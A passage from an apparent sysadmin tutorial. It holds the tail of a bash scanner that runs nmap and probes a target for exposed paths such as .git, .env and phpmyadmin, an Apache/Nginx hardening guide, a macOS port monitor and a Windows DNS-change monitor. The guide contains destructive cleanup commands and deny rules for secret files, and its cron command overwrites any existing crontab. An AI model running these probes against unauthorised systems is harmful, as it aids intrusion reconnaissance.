echo "CRITICAL: Outdated SSL/TLS protocols detected" >> "$TLS_ISSUES_FILE"
fi
# Check for weak cipher suites
if grep -q "DES\|RC4\|MD5" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
echo "HIGH: Weak cipher suites detected" >> "$TLS_ISSUES_FILE"
fi
# Check for certificate issues
if grep -q "expired\|self-signed" "${OUTPUT_DIR}/tls_scan.txt" 2>/dev/null; then
echo "MEDIUM: Certificate issues detected" >> "$TLS_ISSUES_FILE"
fi
# Display TLS results
echo ""
if [ -s "$TLS_ISSUES_FILE" ]; then
echo -e "${RED}TLS/SSL Issues Found:${NC}"
cat "$TLS_ISSUES_FILE"
else
echo -e "${GREEN}✓ No major TLS/SSL issues detected${NC}"
fi
echo ""
}
# Function to run directory busting and permission checks
run_dirbuster() {
print_header "Running Directory Discovery and Permission Checks"
# Check for web ports
WEB_PORTS=$(echo "$OPEN_PORTS" | tr ',' '\n' | grep -E '^(80|443|8080|8443)$' | tr '\n' ',' | sed 's/,$//')
if [ -z "$WEB_PORTS" ]; then
echo "No standard web ports found in open ports, checking defaults..."
WEB_PORTS="80,443"
fi
echo "Running directory discovery on web ports: $WEB_PORTS"
# Check if gobuster is available
if command -v gobuster &> /dev/null; then
echo -e "${GREEN}Using gobuster for enhanced directory discovery and permission checks${NC}"
run_gobuster_scan
else
echo -e "${YELLOW}Gobuster not found. Using fallback method.${NC}"
echo -e "${YELLOW}Install gobuster for enhanced directory permission checks: brew install gobuster${NC}"
fi
# Use nmap's http-enum script for directory discovery
nmap -sV --script http-enum \
--script-args http-enum.basepath='/' \
-p "$WEB_PORTS" \
-oN "${OUTPUT_DIR}/dirbuster.txt" \
"$TARGET" 2>/dev/null
# Common directory wordlist (built-in small list)
COMMON_DIRS="admin administrator backup api config test dev staging uploads download downloads files documents images img css js scripts cgi-bin wp-admin phpmyadmin .git .svn .env .htaccess robots.txt sitemap.xml"
# Quick check for common directories using curl
DIRS_FOUND_FILE="${OUTPUT_DIR}/directories_found.txt"
> "$DIRS_FOUND_FILE"
for port in $(echo "$WEB_PORTS" | tr ',' ' '); do
PROTOCOL="http"
if [[ "$port" == "443" || "$port" == "8443" ]]; then
PROTOCOL="https"
fi
echo "Checking common directories on $PROTOCOL://$TARGET:$port"
for dir in $COMMON_DIRS; do
URL="$PROTOCOL://$TARGET:$port/$dir"
STATUS=$(curl -k -s -o /dev/null -w "%{http_code}" --max-time 3 "$URL" 2>/dev/null)
if [[ "$STATUS" == "200" || "$STATUS" == "301" || "$STATUS" == "302" || "$STATUS" == "401" || "$STATUS" == "403" ]]; then
echo "[$STATUS] $URL" >> "$DIRS_FOUND_FILE"
echo -e "${GREEN}Found:${NC} [$STATUS] $URL"
# Check for permission issues
if [[ "$STATUS" == "403" ]]; then
echo -e "${ORANGE}  ⚠️  Permission denied (403) - Possible misconfiguration${NC}"
echo "[PERMISSION ISSUE] 403 Forbidden: $URL" >> "${OUTPUT_DIR}/permission_issues.txt"
elif [[ "$STATUS" == "401" ]]; then
echo -e "${YELLOW}  🔒 Authentication required (401)${NC}"
echo "[AUTH REQUIRED] 401 Unauthorized: $URL" >> "${OUTPUT_DIR}/permission_issues.txt"
fi
fi
done
done
# Display results
echo ""
if [ -s "$DIRS_FOUND_FILE" ]; then
echo -e "${YELLOW}Directories/Files discovered:${NC}"
cat "$DIRS_FOUND_FILE"
else
echo "No additional directories found"
fi
# Display permission issues if found
if [ -s "${OUTPUT_DIR}/permission_issues.txt" ]; then
echo ""
echo -e "${ORANGE}Directory Permission Issues Found:${NC}"
cat "${OUTPUT_DIR}/permission_issues.txt"
fi
echo ""
}
# Function to generate summary report
generate_summary() {
print_header "SCAN SUMMARY"
CRITICAL_COUNT=0
HIGH_COUNT=0
MEDIUM_COUNT=0
LOW_COUNT=0
INFO_COUNT=0
[ -f "${OUTPUT_DIR}/critical.tmp" ] && CRITICAL_COUNT=$(wc -l < "${OUTPUT_DIR}/critical.tmp")
[ -f "${OUTPUT_DIR}/high.tmp" ] && HIGH_COUNT=$(wc -l < "${OUTPUT_DIR}/high.tmp")
[ -f "${OUTPUT_DIR}/medium.tmp" ] && MEDIUM_COUNT=$(wc -l < "${OUTPUT_DIR}/medium.tmp")
[ -f "${OUTPUT_DIR}/low.tmp" ] && LOW_COUNT=$(wc -l < "${OUTPUT_DIR}/low.tmp")
[ -f "${OUTPUT_DIR}/info.tmp" ] && INFO_COUNT=$(wc -l < "${OUTPUT_DIR}/info.tmp")
echo "Target: $TARGET"
echo "Scan Date: $(date)"
echo ""
echo -e "${RED}Critical:       $CRITICAL_COUNT${NC}"
echo -e "${ORANGE}High:           $HIGH_COUNT${NC}"
echo -e "${YELLOW}Medium:         $MEDIUM_COUNT${NC}"
echo -e "${BLUE}Low:            $LOW_COUNT${NC}"
echo -e "${GREEN}Informational:  $INFO_COUNT${NC}"
echo ""
TOTAL=$((CRITICAL_COUNT + HIGH_COUNT + MEDIUM_COUNT + LOW_COUNT))
echo "Total Vulnerabilities: $TOTAL"
# Risk assessment
if [ $CRITICAL_COUNT -gt 0 ]; then
echo -e "${RED}🚨 RISK LEVEL: CRITICAL - Immediate action required!${NC}"
elif [ $HIGH_COUNT -gt 0 ]; then
echo -e "${ORANGE}⚠️  RISK LEVEL: HIGH - Action required soon${NC}"
elif [ $MEDIUM_COUNT -gt 0 ]; then
echo -e "${YELLOW}⚡ RISK LEVEL: MEDIUM - Should be addressed${NC}"
elif [ $LOW_COUNT -gt 0 ]; then
echo -e "${BLUE}📋 RISK LEVEL: LOW - Monitor and plan fixes${NC}"
else
echo -e "${GREEN}✅ RISK LEVEL: MINIMAL - Good security posture${NC}"
fi
# Save summary to file
{
echo "Vulnerability Scan Summary for $TARGET"
echo "======================================"
echo "Scan Date: $(date)"
echo ""
echo "Critical: $CRITICAL_COUNT"
echo "High: $HIGH_COUNT"
echo "Medium: $MEDIUM_COUNT"
echo "Low: $LOW_COUNT"
echo "Informational: $INFO_COUNT"
echo "Total: $TOTAL"
echo ""
echo "Additional Checks:"
[ -f "${OUTPUT_DIR}/tls_issues.txt" ] && [ -s "${OUTPUT_DIR}/tls_issues.txt" ] && echo "TLS/SSL Issues: $(wc -l < "${OUTPUT_DIR}/tls_issues.txt")"
[ -f "${OUTPUT_DIR}/directories_found.txt" ] && [ -s "${OUTPUT_DIR}/directories_found.txt" ] && echo "Directories Found: $(wc -l < "${OUTPUT_DIR}/directories_found.txt")"
[ -f "${OUTPUT_DIR}/gobuster_permissions.txt" ] && [ -s "${OUTPUT_DIR}/gobuster_permissions.txt" ] && echo "Directory Permission Issues: $(wc -l < "${OUTPUT_DIR}/gobuster_permissions.txt")"
} > "${OUTPUT_DIR}/summary.txt"
}
# Main execution
main() {
echo "Starting vulnerability scan for $TARGET…"
# Check if required tools are installed
if ! command -v nmap &> /dev/null; then
echo -e "${RED}Error: nmap is not installed. Please install nmap first.${NC}"
exit 1
fi
if ! command -v curl &> /dev/null; then
echo -e "${RED}Error: curl is not installed. Please install curl first.${NC}"
exit 1
fi
# Check for optional tools
if command -v gobuster &> /dev/null; then
echo -e "${GREEN}✓ Gobuster found - Enhanced directory scanning enabled${NC}"
else
echo -e "${YELLOW}ℹ️  Gobuster not found - Basic directory scanning will be used${NC}"
echo -e "${YELLOW}   Install with: brew install gobuster (macOS) or apt install gobuster (Linux)${NC}"
fi
# Run the main vulnerability scan
run_scan
# Run TLS/SSL checks
run_tls_checks
# Run directory discovery
run_dirbuster
# Parse results
parse_vulnerabilities
# Display formatted results
display_results
# Generate summary
generate_summary
# Cleanup temporary files
rm -f "${OUTPUT_DIR}"/*.tmp
print_header "SCAN COMPLETE"
echo "All results saved in: $OUTPUT_DIR"
echo "Summary saved in: ${OUTPUT_DIR}/summary.txt"
echo -e "${GREEN}Scan completed at: $(date)${NC}"
}
# Run main function
main
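The grep patterns in parse_vulnerabilities() bin findings by keywords and rough score ranges. If you want that binning to be explicit, a helper that maps a numeric CVSS v3 base score to a severity band looks like this (a sketch; it uses awk because bash arithmetic cannot compare floating-point values):

```shell
#!/bin/bash
# Map a CVSS v3 base score to a severity band:
# 0.1-3.9 Low, 4.0-6.9 Medium, 7.0-8.9 High, 9.0-10.0 Critical.
cvss_severity() {
    awk -v s="$1" 'BEGIN {
        if (s >= 9.0)      print "CRITICAL"
        else if (s >= 7.0) print "HIGH"
        else if (s >= 4.0) print "MEDIUM"
        else if (s > 0.0)  print "LOW"
        else               print "INFO"
    }'
}

cvss_severity 9.8   # CRITICAL
cvss_severity 5.3   # MEDIUM
```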

Here's a comprehensive guide to fixing each type of directory permission issue the script above might find, with examples for Apache and Nginx:

## 1. **403 Forbidden Errors**
### What it means:
The directory/file exists but the server is denying access to it.
### How to fix:
# For Apache (.htaccess)
# Add to .htaccess in the directory (Apache 2.2 syntax; on Apache 2.4 use "Require all denied"):
Order deny,allow
Deny from all
# Or remove the directory from web access entirely
# Move sensitive directories outside the web root
mv /var/www/html/backup /var/backups/
# For Nginx
# Add to nginx.conf:
location /admin {
deny all;
return 404;  # Return 404 instead of 403 to hide existence
}
## 2. **401 Unauthorized Errors**
### What it means:
Authentication is required but may not be properly configured.
### How to fix:
# For Apache - create .htpasswd file
htpasswd -c /etc/apache2/.htpasswd username
# Add to .htaccess:
AuthType Basic
AuthName "Restricted Access"
AuthUserFile /etc/apache2/.htpasswd
Require valid-user
# For Nginx:
# Install apache2-utils for htpasswd
sudo apt-get install apache2-utils
htpasswd -c /etc/nginx/.htpasswd username
# Add to nginx.conf:
location /admin {
auth_basic "Restricted Access";
auth_basic_user_file /etc/nginx/.htpasswd;
}
## 3. **Directory Listing Enabled (CRITICAL)**
### What it means:
Anyone can see all files in the directory - major security risk!
### How to fix:
# For Apache
# Method 1: Add to .htaccess in the directory
Options -Indexes
# Method 2: Add to Apache config (httpd.conf or apache2.conf)
<Directory /var/www/html>
Options -Indexes
</Directory>
# For Nginx
# Add to nginx.conf (Nginx doesn't have directory listing by default)
# If you see it enabled, remove:
autoindex off;  # This should be the default
# Create index files in empty directories
echo "<!DOCTYPE html><html><head><title>403 Forbidden</title></head><body><h1>403 Forbidden</h1></body></html>" > index.html
## 4. **Sensitive Files Exposed (CRITICAL)**
### Common exposed files and fixes:
#### **.git directory**
# Remove .git from production
rm -rf /var/www/html/.git
# Or block access via .htaccess
<Files ~ "^\.git">
Order allow,deny
Deny from all
</Files>
# For Nginx:
location ~ /\.git {
deny all;
return 404;
}
#### **.env file**
# Move outside web root
mv /var/www/html/.env /var/www/
# Update your application to read from new location
# In PHP: require_once __DIR__ . '/../.env';
# Block via .htaccess
<Files .env>
Order allow,deny
Deny from all
</Files>
#### **Configuration files (config.php, settings.php)**
# Move sensitive configs outside web root
mv /var/www/html/config.php /var/www/config/
# Or restrict access via .htaccess
<Files "config.php">
Order allow,deny
Deny from all
</Files>
#### **Backup files**
# Remove backup files from the web directory
# (parentheses are needed so -delete applies to all three patterns)
find /var/www/html -type f \( -name "*.bak" -o -name "*.backup" -o -name "*.old" \) -delete
# Create a cron job to clean regularly
echo "0 2 * * * find /var/www/html -type f \\( -name '*.bak' -o -name '*.backup' \\) -delete" | crontab -
## 5. **General Security Best Practices**
### Create a comprehensive .htaccess file:
# Disable directory browsing
Options -Indexes
# Deny access to hidden files and directories
<Files .*>
Order allow,deny
Deny from all
</Files>
# Deny access to backup and source files
<FilesMatch "(\.(bak|backup|config|dist|fla|inc|ini|log|psd|sh|sql|swp)|~)$">
Order allow,deny
Deny from all
</FilesMatch>
# Protect sensitive files
<FilesMatch "^(\.htaccess|\.htpasswd|\.env|composer\.(json|lock)|package(-lock)?\.json)$">
Order allow,deny
Deny from all
</FilesMatch>
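Nginx ignores `.htaccess` files, so the equivalent protections belong in the server block. A sketch under that assumption (adapt the patterns to your site):

```nginx
server {
    # ... existing listen / server_name / root directives ...

    # Disable directory listing (the default, but explicit is safer)
    autoindex off;

    # Deny access to hidden files and directories (.git, .env, .htaccess, ...)
    location ~ /\. {
        deny all;
        return 404;
    }

    # Deny access to backup and source files
    location ~* \.(bak|backup|config|dist|fla|inc|ini|log|psd|sh|sql|swp)$ {
        deny all;
        return 404;
    }

    # Deny access to dependency manifests
    location ~ /(composer\.(json|lock)|package(-lock)?\.json)$ {
        deny all;
        return 404;
    }
}
```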
## 6. Quick Security Audit Commands
Run these commands to find and fix common issues:
# Find all .git directories in web root
find /var/www/html -type d -name .git
# Find all .env files
find /var/www/html -name .env
# Find all backup files
find /var/www/html -type f \( -name "*.bak" -o -name "*.backup" -o -name "*.old" -o -name "*~" \)
# Find directories without index files (potential listing)
find /var/www/html -type d -exec sh -c '[ ! -f "$1/index.html" ] && [ ! -f "$1/index.php" ] && echo "$1"' _ {} \;
# Set proper permissions
find /var/www/html -type d -exec chmod 755 {} \;
find /var/www/html -type f -exec chmod 644 {} \;
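These checks can be wrapped into a single helper so the audit is one command. A sketch (the function name and web-root argument are illustrative):

```shell
# Report exposed .git directories, .env files, and backup files under a web root.
audit_webroot() {    # audit_webroot <webroot>
    local root="$1"
    echo "== .git directories =="
    find "$root" -type d -name .git
    echo "== .env files =="
    find "$root" -type f -name .env
    echo "== backup files =="
    find "$root" -type f \( -name "*.bak" -o -name "*.backup" -o -name "*.old" -o -name "*~" \)
}

# audit_webroot /var/www/html
```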
## 7. Testing Your Fixes
After implementing fixes, test them:
# Test that sensitive files are blocked
curl -I https://yoursite.com/.git/config
# Should return 403 or 404
# Test that directory listing is disabled
curl https://yoursite.com/images/
# Should not show a file list
# Run the vunscan.sh script again
./vunscan.sh yoursite.com
# Verify issues are resolved
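The spot checks above can be batched. The sketch below (function names, site URL, and path list are all illustrative) walks a list of sensitive paths and flags anything still returning 200:

```shell
# Classify an HTTP status: 200 means the file is reachable (exposed),
# anything else (403, 404, ...) means the request was blocked.
classify() {    # classify <http_status>
    case "$1" in
        200) echo "EXPOSED" ;;
        *)   echo "BLOCKED" ;;
    esac
}

# Probe each path on a site and print a verdict per URL.
check_paths() {    # check_paths <base_url> <path>...
    local base="$1" path code
    shift
    for path in "$@"; do
        code=$(curl -s -o /dev/null -w '%{http_code}' "$base$path")
        printf '%s %s %s\n' "$(classify "$code")" "$code" "$base$path"
    done
}

# check_paths https://yoursite.com /.git/config /.env /config.php.bak
```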
## 8. Preventive Measures
### 1. Use a deployment script that excludes sensitive files
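One way to do this is to package releases with an exclude list so sensitive files never reach the server. A sketch using `tar` (`rsync --exclude-from` achieves the same during sync; the function name and patterns here are illustrative):

```shell
# Build a release archive that leaves sensitive files behind.
package_release() {    # package_release <source_dir> <archive>
    tar -czf "$2" \
        --exclude='.git' \
        --exclude='.env' \
        --exclude='*.bak' \
        --exclude='*.old' \
        -C "$1" .
}

# package_release ./myapp release.tar.gz
# Then extract release.tar.gz into the web root on the server.
```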
### 2. Regular security scans
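For example, a crontab entry that re-runs the scanner nightly (the script path, site, and log file are placeholders; install it with `crontab -e`, or append it with `(crontab -l; echo '...') | crontab -` so existing entries are preserved):

```
# m  h  dom mon dow  command
0 3 * * * /usr/local/bin/vunscan.sh yoursite.com >> /var/log/vunscan.log 2>&1
```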
### 3. Use a Web Application Firewall (WAF) like ModSecurity or Cloudflare
Remember: the goal is not just to hide these files (security through obscurity), but to properly secure them or remove them from the web-accessible directory entirely.

macOS: How to see which processes are using a specific port (e.g. 443)

Below is a useful script for when you want to see which processes are using a specific port; it refreshes the view every 20 seconds.

#!/bin/bash
# Port Monitor Script for macOS
# Usage: ./port_monitor.sh <port_number>

# Check if port number is provided
if [ $# -eq 0 ]; then
    echo "Usage: $0 <port_number>"
    echo "Example: $0 8080"
    exit 1
fi

PORT=$1

# Validate port number
if ! [[ $PORT =~ ^[0-9]+$ ]] || [ $PORT -lt 1 ] || [ $PORT -gt 65535 ]; then
    echo "Error: Please provide a valid port number (1-65535)"
    exit 1
fi

# Function to display processes using the port
show_port_usage() {
    local timestamp=$(date "+%Y-%m-%d %H:%M:%S")

    # Clear screen for better readability
    clear
    echo "=================================="
    echo "Port Monitor - Port $PORT"
    echo "Last updated: $timestamp"
    echo "Press Ctrl+C to exit"
    echo "=================================="
    echo

    # Check for processes using the port with lsof - both TCP and UDP
    if lsof -i :$PORT &>/dev/null || netstat -an | grep -E "[:.]$PORT[[:space:]]" &>/dev/null; then
        echo "Processes using port $PORT:"
        echo
        lsof -i :$PORT -P -n | head -1
        echo "--------------------------------------------------------------------------------"
        lsof -i :$PORT -P -n | tail -n +2
        echo

        # Also show netstat information for additional context
        echo "Network connections on port $PORT:"
        echo
        printf "%-6s %-30s %-30s %-12s\n" "PROTO" "LOCAL ADDRESS" "FOREIGN ADDRESS" "STATE"
        echo "--------------------------------------------------------------------------------------------"

        # Show all connections (LISTEN, ESTABLISHED, etc.)
        # Use netstat -n to show numeric addresses
        netstat -anp tcp | grep -E "\.$PORT[[:space:]]" | while read line; do
            # Extract the relevant fields from netstat output
            proto=$(echo "$line" | awk '{print $1}')
            local_addr=$(echo "$line" | awk '{print $4}')
            foreign_addr=$(echo "$line" | awk '{print $5}')
            state=$(echo "$line" | awk '{print $6}')
            # Only print if we have valid data
            if [ -n "$proto" ] && [ -n "$local_addr" ]; then
                printf "%-6s %-30s %-30s %-12s\n" "$proto" "$local_addr" "$foreign_addr" "$state"
            fi
        done

        # Also check UDP connections
        netstat -anp udp | grep -E "\.$PORT[[:space:]]" | while read line; do
            proto=$(echo "$line" | awk '{print $1}')
            local_addr=$(echo "$line" | awk '{print $4}')
            foreign_addr=$(echo "$line" | awk '{print $5}')
            printf "%-6s %-30s %-30s %-12s\n" "$proto" "$local_addr" "$foreign_addr" "-"
        done

        # Also check for any established connections using lsof
        echo
        echo "Active connections with processes:"
        echo "--------------------------------------------------------------------------------------------"
        lsof -i :$PORT -P -n 2>/dev/null | grep -v LISTEN | tail -n +2 | while read line; do
            if [ -n "$line" ]; then
                echo "$line"
            fi
        done
    else
        echo "No processes found using port $PORT"
        echo
        # Check if the port might be in use but not showing up in lsof
        local netstat_result=$(netstat -anv | grep -E "\.$PORT ")
        if [ -n "$netstat_result" ]; then
            echo "However, netstat shows activity on port $PORT:"
            echo "$netstat_result"
        fi
    fi

    echo
    echo "Refreshing in 20 seconds... (Press Ctrl+C to exit)"
}

# Trap Ctrl+C to exit gracefully
trap 'echo -e "\n\nExiting port monitor..."; exit 0' INT

# Main loop - refresh every 20 seconds
while true; do
    show_port_usage
    sleep 20
done
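If you just need a one-shot answer rather than a live monitor, `lsof` alone is usually enough. The helper below (its name is illustrative) reduces the output to unique command/PID pairs:

```shell
# List the commands and PIDs listening on a TCP port, one "COMMAND PID" per line.
listeners_on_port() {    # listeners_on_port <port>
    lsof -nP -iTCP:"$1" -sTCP:LISTEN 2>/dev/null | awk 'NR>1 {print $1, $2}' | sort -u
}

# listeners_on_port 443
```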

Windows Server: Polling critical DNS entries for any changes or errors

If you have tier 1 services that depend on a few DNS records, you may want a simple batch job to monitor those DNS records for changes or deletion.

The script below monitors an example list of DNS entries (replace these records with the ones you want to monitor).

@echo off
setlocal enabledelayedexpansion
REM ============================================================================
REM DNS Monitor Script for Windows Server
REM Purpose: Monitor DNS entries for changes every 15 minutes
REM Author: Andrew Baker
REM Version: 1.0
REM Date: August 13, 2018
REM ============================================================================
REM Configuration Variables
set "LOG_FILE=dns_monitor.log"
set "PREVIOUS_FILE=dns_previous.tmp"
set "CURRENT_FILE=dns_current.tmp"
set "CHECK_INTERVAL=900"
REM DNS Entries to Monitor (Comma Separated List)
REM Add or modify domains as needed
set "DNS_LIST=google.com,microsoft.com,github.com,stackoverflow.com,amazon.com,facebook.com,twitter.com,linkedin.com,youtube.com,cloudflare.com"
REM Initialize log file with header if it doesn't exist
if not exist "%LOG_FILE%" (
    echo DNS Monitor Log - Started on %DATE% %TIME% > "%LOG_FILE%"
    echo ============================================================================ >> "%LOG_FILE%"
    echo. >> "%LOG_FILE%"
)

:MAIN_LOOP
echo [%DATE% %TIME%] Starting DNS monitoring cycle...
echo [%DATE% %TIME%] INFO: Starting DNS monitoring cycle >> "%LOG_FILE%"

REM Clear current results file
if exist "%CURRENT_FILE%" del "%CURRENT_FILE%"

REM Process each DNS entry
for %%d in (%DNS_LIST%) do (
    call :CHECK_DNS "%%d"
)

REM Compare with previous results if they exist
if exist "%PREVIOUS_FILE%" (
    call :COMPARE_RESULTS
) else (
    echo [%DATE% %TIME%] INFO: First run - establishing baseline >> "%LOG_FILE%"
)
REM Copy current results to previous for next comparison
copy "%CURRENT_FILE%" "%PREVIOUS_FILE%" >nul 2>&1
echo [%DATE% %TIME%] DNS monitoring cycle completed. Next check in 15 minutes...
echo [%DATE% %TIME%] INFO: DNS monitoring cycle completed >> "%LOG_FILE%"
echo. >> "%LOG_FILE%"
REM Wait 15 minutes (900 seconds) before next check
timeout /t %CHECK_INTERVAL% /nobreak >nul
goto MAIN_LOOP
REM ============================================================================
REM Function: CHECK_DNS
REM Purpose: Resolve DNS entry and log results
REM Parameter: %1 = Domain name to check
REM ============================================================================
:CHECK_DNS
set "DOMAIN=%~1"
echo Checking DNS for: %DOMAIN%
REM Perform nslookup and capture results
nslookup "%DOMAIN%" > temp_dns.txt 2>&1
REM Check if nslookup was successful
if %ERRORLEVEL% equ 0 (
    REM Extract IP addresses from nslookup output.
    REM "skip=1" skips the first Address line, which is the DNS server itself
    REM (on Windows, nslookup does not tag the server line with "#53").
    REM Matching "Address" also catches "Addresses:"; only the first address
    REM of a multi-address answer is captured.
    set "IP_ADDRESS="
    for /f "skip=1 tokens=2" %%i in ('findstr /c:"Address" temp_dns.txt') do (
        set "IP_ADDRESS=%%i"
        echo %DOMAIN%,%%i >> "%CURRENT_FILE%"
        echo [%DATE% %TIME%] INFO: %DOMAIN% resolves to %%i >> "%LOG_FILE%"
    )
    REM Handle case where no IP addresses were found in a successful lookup
    if not defined IP_ADDRESS (
        echo %DOMAIN%,RESOLUTION_ERROR >> "%CURRENT_FILE%"
        echo [%DATE% %TIME%] ERROR: %DOMAIN% - No IP addresses found in DNS response >> "%LOG_FILE%"
        type temp_dns.txt >> "%LOG_FILE%"
        echo. >> "%LOG_FILE%"
    )
) else (
    REM DNS resolution failed
    echo %DOMAIN%,DNS_FAILURE >> "%CURRENT_FILE%"
    echo [%DATE% %TIME%] ERROR: %DOMAIN% - DNS resolution failed >> "%LOG_FILE%"
    type temp_dns.txt >> "%LOG_FILE%"
    echo. >> "%LOG_FILE%"
)
REM Clean up temporary file
if exist temp_dns.txt del temp_dns.txt
goto :EOF
REM ============================================================================
REM Function: COMPARE_RESULTS
REM Purpose: Compare current DNS results with previous results
REM ============================================================================
:COMPARE_RESULTS
echo Comparing DNS results for changes...

REM Read previous results into memory
if exist "%PREVIOUS_FILE%" (
    for /f "tokens=1,2 delims=," %%a in (%PREVIOUS_FILE%) do (
        set "PREV_%%a=%%b"
    )
)

REM Compare current results with previous
for /f "tokens=1,2 delims=," %%a in (%CURRENT_FILE%) do (
    set "CURRENT_DOMAIN=%%a"
    set "CURRENT_IP=%%b"
    REM Get previous IP for this domain
    set "PREVIOUS_IP=!PREV_%%a!"
    if "!PREVIOUS_IP!"=="" (
        REM New domain added
        echo [%DATE% %TIME%] INFO: New domain added to monitoring: !CURRENT_DOMAIN! = !CURRENT_IP! >> "%LOG_FILE%"
    ) else if "!PREVIOUS_IP!" neq "!CURRENT_IP!" (
        REM DNS change detected
        echo [%DATE% %TIME%] WARNING: DNS change detected for !CURRENT_DOMAIN! >> "%LOG_FILE%"
        echo [%DATE% %TIME%] WARNING: Previous IP: !PREVIOUS_IP! >> "%LOG_FILE%"
        echo [%DATE% %TIME%] WARNING: Current IP:  !CURRENT_IP! >> "%LOG_FILE%"
        echo [%DATE% %TIME%] WARNING: *** INVESTIGATE DNS CHANGE *** >> "%LOG_FILE%"
        echo. >> "%LOG_FILE%"
        REM Also display warning on console
        echo.
        echo *** WARNING: DNS CHANGE DETECTED ***
        echo Domain: !CURRENT_DOMAIN!
        echo Previous: !PREVIOUS_IP!
        echo Current:  !CURRENT_IP!
        echo Check log file for details: %LOG_FILE%
        echo.
    )
)

REM Check for domains that disappeared from current results
for /f "tokens=1,2 delims=," %%a in (%PREVIOUS_FILE%) do (
    set "CHECK_DOMAIN=%%a"
    set "FOUND=0"
    for /f "tokens=1 delims=," %%c in (%CURRENT_FILE%) do (
        if "%%c"=="!CHECK_DOMAIN!" set "FOUND=1"
    )
    if "!FOUND!"=="0" (
        echo [%DATE% %TIME%] WARNING: Domain !CHECK_DOMAIN! no longer resolving or removed from monitoring >> "%LOG_FILE%"
    )
)
goto :EOF
REM ============================================================================
REM End of Script
REM ============================================================================